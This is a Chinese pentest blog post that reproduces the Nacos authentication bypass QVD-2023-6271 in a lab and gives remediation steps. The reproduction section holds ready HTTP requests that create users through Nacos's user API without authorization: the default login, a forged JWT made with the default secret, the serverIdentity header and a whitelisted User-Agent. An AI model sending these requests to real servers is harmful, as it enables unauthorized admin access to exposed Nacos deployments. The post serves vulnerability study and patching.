1. 首页
  2. 渗透测试

QVD-2023-6271:Nacos身份认证绕过漏洞

【推荐学习】暗月渗透测试培训 十多年渗透经验,体系化培训渗透测试 、高效学习渗透测试,欢迎添加微信好友aptimeok 咨询。

0x01 简介
nacos是一个易于使用的动态服务发现、配置和服务管理平台,用于构建云原生应用程序。其默认配置下存在权限绕过。

0x02 漏洞概述
开源服务管理平台Nacos在默认配置下未对token.secret.key进行修改,导致远程攻击者可以绕过密钥认证进入后台,造成系统受控等后果。
0x03 影响版本
nacos <=2.2.0

0x04 环境搭建

1. 下载nacos:

https://github.com/alibaba/nacos/releases/tag/2.2.0

这里选择官方打包好的jar包下载

QVD-2023-6271:Nacos身份认证绕过漏洞

2. 进入 nacos/bin目录下,输入如下命令启动项目startup.cmd -m standalone

3. 访问
http://192.168.xx.xx:8848/nacos/index.html

QVD-2023-6271:Nacos身份认证绕过漏洞

0x05 漏洞复现

方式一:默认账号

输入 nacos/nacos 成功登陆后台

QVD-2023-6271:Nacos身份认证绕过漏洞
 

方式二:默认未授权

发送如下数据包,成功创建用户
POST /nacos/v1/auth/users HTTP/1.1Host: 192.168.31.112:8848Content-Type: application/x-www-form-urlencodedContent-Length: 31
username=test02&password=test02
 
QVD-2023-6271:Nacos身份认证绕过漏洞
 

方式三:默认JWT-secret

1.在nacos/conf/application.properties中设置nacos.core.auth.enabled=true开启权限认证
 
QVD-2023-6271:Nacos身份认证绕过漏洞
 
2. 发送如下数据包成功创建用户
POST /nacos/v1/auth/users?accessToken=eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6MTY3OTA4NTg3NX0.WT8N_acMlow8KTHusMacfvr84W4osgSdtyHu9p49tvc HTTP/1.1Host: 192.168.31.112:8848Content-Type: application/x-www-form-urlencodedContent-Length: 31
username=test03&password=test03
 
QVD-2023-6271:Nacos身份认证绕过漏洞
 

方式四:默认头部

发送如下数据包,成功创建用户
POST /nacos/v1/auth/users HTTP/1.1Host: 192.168.31.112:8848Content-Type: application/x-www-form-urlencodedserverIdentity: securityContent-Length: 31
username=test05&password=test05
 
QVD-2023-6271:Nacos身份认证绕过漏洞

方式五:低版本(nacos<1.4.1)默认白名单UA

1.在nacos/conf/application.properties中设置
nacos.core.auth.enable.userAgentAuthWhite=true开启白名单UA

QVD-2023-6271:Nacos身份认证绕过漏洞
2. 发送如下数据包成功创建用户
POST /nacos/v1/auth/users HTTP/1.1Host: 192.168.31.112:8848User-Agent: Nacos-ServerContent-Type: application/x-www-form-urlencodedContent-Length: 31
username=test04&password=test04
QVD-2023-6271:Nacos身份认证绕过漏洞
0x06 修复方式
1.升级至最新版本
2.删除默认配置中的下列选项,启动nacos时必须手动配置
nacos.core.auth.server.identity.key
nacos.core.auth.server.identity.value
nacos.core.auth.plugin.nacos.token.secret.key

QVD-2023-6271:Nacos身份认证绕过漏洞

原创文章,作者:mOon,如若转载,请注明出处:https://www.moonsec.com/8326.html

联系我们

400-800-8888

在线咨询:点击这里给我发消息

邮件:admin@example.com

工作时间:周一至周五,9:30-18:30,节假日休息